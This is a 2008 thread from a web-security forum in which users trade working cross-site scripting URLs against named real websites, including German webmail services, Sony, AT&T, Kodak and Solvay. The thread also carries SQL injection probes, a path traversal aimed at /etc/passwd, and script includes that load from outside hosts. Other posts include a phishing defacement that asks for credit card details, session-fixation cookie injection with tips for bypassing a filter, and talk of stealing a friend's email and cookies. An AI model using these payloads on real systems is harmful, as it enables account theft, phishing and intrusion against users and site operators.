This is for hurting admins. Don't hurt admins ;) Here's some more fun stuff about them in German.

http://www.cuil.com/search?q=test&m=%22%27%27%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3EIQ%20Test

cookie stealer for sony station pass anyone?

https://auth.station.sony.com/login?service=%22%3B%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3Ehttps%3A//account.station.sony.com/j_acegi_cas_security_check%26theme%3DuramWeb%26locale%3Den_US

http://www.xssed.com/archive/author=PaPPy/

most popular webmail service in germany: gmx.net
http://suche.gmx.net/search/pic/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.gmx.net/search/web/?su=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://suche.gmx.net/search/dir/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.gmx.net/search/LiveSuche/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://produkte.suche.gmx.net/search.do?s=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

at least as popular as GMX with same problems: web.de
http://suche.web.de/search/web/?su=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://suche.web.de/search/pic/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.web.de/search/dir/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.web.de/search/news/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.web.de/search/software/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://produkte.suche.web.de/search.do?s=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E



Edited 2 time(s). Last edit at 09/05/2008 08:18PM by Reiners.

Oh I wanted to get a friends emails once and developed a gmx.net one, but then i found out that she uses thunderbird and never actually logs in...

I wonder if that one still works, it wasn't the same as yours. let me find it...

http://f.uck-you.com/%3Fwho%3D%3Ciframe%20src%3Dhttp%3A//google.com%3E
a site i came across, lol

http://www.xssed.com/archive/author=PaPPy/

http://www.wireless.att.com/global-search/search.jsp?q=%22%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E%26x%3D0%26y%3D0%26searchEngine%3Dg

http://www.xssed.com/archive/author=PaPPy/

These guys make pharmaceuticals and chemicals... like industrial hydrogen peroxide, the kind used in rocket fuel and terrorist bombs.

http://www.solvay.com/services/searchresult/0,,2276-2-0,00.htm?query=%22%3E%3Cscript%3Ealert('owned');%3C/script%3E



Edited 1 time(s). Last edit at 09/20/2008 01:22PM by peekay.

terrorist chemicals you say?


hxtp://www.solvay.com/services/searchresult/0,,2276-2-0,00.htm?query=%22%3E%3Cstyle%3Efont%20{display:none;}%3C/style%3E%3Cscript%3Edocument.getElementById(%27AutoNumber1%27).innerHTML%20=%20%22%3Ch1%3EToday!%20Big%20terrorist%20chemical%20sale!%3C/h1%3EGrab%20%27em%20while%20the%20government%20is%20unaware!%3Cbr%3EJust%20send%20your%20credit%20card%20information%20to%20notascam@aol.com%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cdiv%20style=display:none%3Ea%22;%3C/script%3E%3Ca%20x=%22



Edited 1 time(s). Last edit at 09/23/2008 03:10PM by Kyo.

above doesnt work in IE7, but does in FF3

http://www.xssed.com/archive/author=PaPPy/

http://pbfcomics.com/?cid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://sex.de/main.php?main=%22%3Cscript%20src=//h4k.in%3E

what were you doing on that site?!

He was reading the articles.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Was genau ist Oroanalkontakt?

-id

@id: you definitely do not wanna know

@thrill: research for my homework

http://www.123people.com/s/HASH(0x%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E537e740)/United+States

Dunno if we had that one already...

Thi's is something weird..

hxxps://addons.mozilla.org/en-US/firefox/search?q=%C0%22%20onmouseover=alert(/xss/.source)%20\&cat=all

Tested on FF 3.0.3 (UTF-8)

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Wow, cicatriz! Unexpected and interesting find!

Wow, cicatriz! Unexpected and interesting find!
This may be of some help in explanation: http://wikisecure.net/articles/uri-encoding-to-bypass-idsips/

http://my.att.net/s/s.dll?num=10&spage=search/resultshome1.htm&searchType=web&string=att&where=*/%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3B/*&sm.x=0&sm.y=0&sm=Go

EDIT: AT&T makes phishing easy: https://uversecentral1.att.com/uvp/home/explore?umaurl=:a@google.com%3F

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 10/16/2008 12:44PM by tx.

Thanks DoctorDan!
I'll read it. I've found this also:

http://applesoup.googlepages.com/bypass_filter.txt

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

this is probably my favourite:

http://ha.ckers.org_xss.js.sapo.pt that translates to... http://pesquisa.sapo.pt/?q=ha+ckers+org+xss+js

:P



Edited 1 time(s). Last edit at 10/21/2008 11:58PM by iNs4n3.

Hi guys

I'm finally ready to post some vulnerabilities that I've found lazily browsing the web, for fun/profit.

Enjoy them.

-- Italian Hosting --
http://www.hosty.it/index.jsp?sezione=registrazione_dominio_step1&dominio=%3CScripT%3Ealert%286%29%3C%2FScripT%3E&estensione=.it&opzione=REG_DOM [reflected XSS]

--- Goa/Trance world known service ---
http://217.160.136.176/cgi-bin/search.cgi [reflected XSS in the search bar]

-- Deputati DS, politic web site (anyway I'm with them, not with berlusconi)
http://www.deputatids.it [reflected XSS in search bar]
http://www.deputatids.it/Select.asp?Section=Deputato&ID=%27 [sql injection]

-- Supermicro--
http://www.supermicro.com/wheretobuy/europe.cfm?rgn=115&cmp=%27 [actually they putted some WAF, anyway the vulnerability was exploitable some weeks ago]

-- Atlantis, italian router manufacturer
http://www.atlantis-land.com/ita/prodotti.php?l1=%27&l2=%27 [weird error]

--Mps Italia, mobile phone services
http://www.mpsitalia.com/index.php?notizia=3 [confirmed sql injection in the "notizie" parameter]

-- Toshiba
http://aps2.toshiba-tro.de/wlan/?page=../../../../etc/passwd [include bug, need to be refined :)]

+++eat, fuck, hack+++

And, Kodak:

http://www.kodak.com/global/en/service/products/ekn035324.jhtml?pq-path=12998%22;alert(0),foo=%22

http://www.kodak.com/eknec/PageQuerier.jhtml?pq-path=204&pq-locale=es_AR&successURI=%22%3E%3Cimg/src/onerror=%22alert(%27xss

@euronymous:

http://demodms.hosty.it/index.php?redirection=%22%3E%3Ciframe/src=%22javascript:alert(%27XSS%27)

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]



Edited 1 time(s). Last edit at 10/22/2008 04:25PM by C1c4Tr1Z.

@eurodynams


http://aps2.toshiba-tro.de/wlan/?page=../index An infinite loop.May break your browser:)

I found this one some time ago http://www.zorpia.com/email/optout/<BODY%20ONLOAD=alert(document.cookie)%3E

Almost managed to create a fixed session with http://zorpia.com/email/optout/%3CMETA%20HTTP-EQUIV=%22Set-Cookie%22%20Content=%22zorpia_session=abc%3Bpath=%2F%3Bexpires=0%22%3E .. only thing holding me back is setting the path to '/'
The filter replaces / for </b>. Would anyone know a way around this?

try double encoding - and don#t forget to set the domain right :)

%22Set-Cookie%22%20Content=%22zorpia_session=abcdefg%3Bpath=%252F%3Bdomain=.zorpia.com%3Bexpires=0%22%3E

Thanks Mario, very much appreciated!

Here's something to laugh/cry about.
This site claims to be "100% secure". It also has a "Verified Secure Certification Seal" which seems to be pretty useless, check it out.

XSS:
http://www.rockler.com/search_results.cfm?filter=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E

Also generates weak session IDs:
55851486
55851489
55851496
55851497


The rockler.com Verified Secure Certification seal has been validated and is authentic. The Verified Secure scanning system actively searches this website for thousands of known vulnerabilities defined by the Payment Card Industry Data Security Standards scanning guidelines. You can shop in confidence knowing that rockler.com is taking precautions to help keep your personal information secure.

PCI DSS scanning guidelines that can't detect a simple XSS?

Just comes to show how insecure things really are.

Yeah, most of these scans don't check for XSS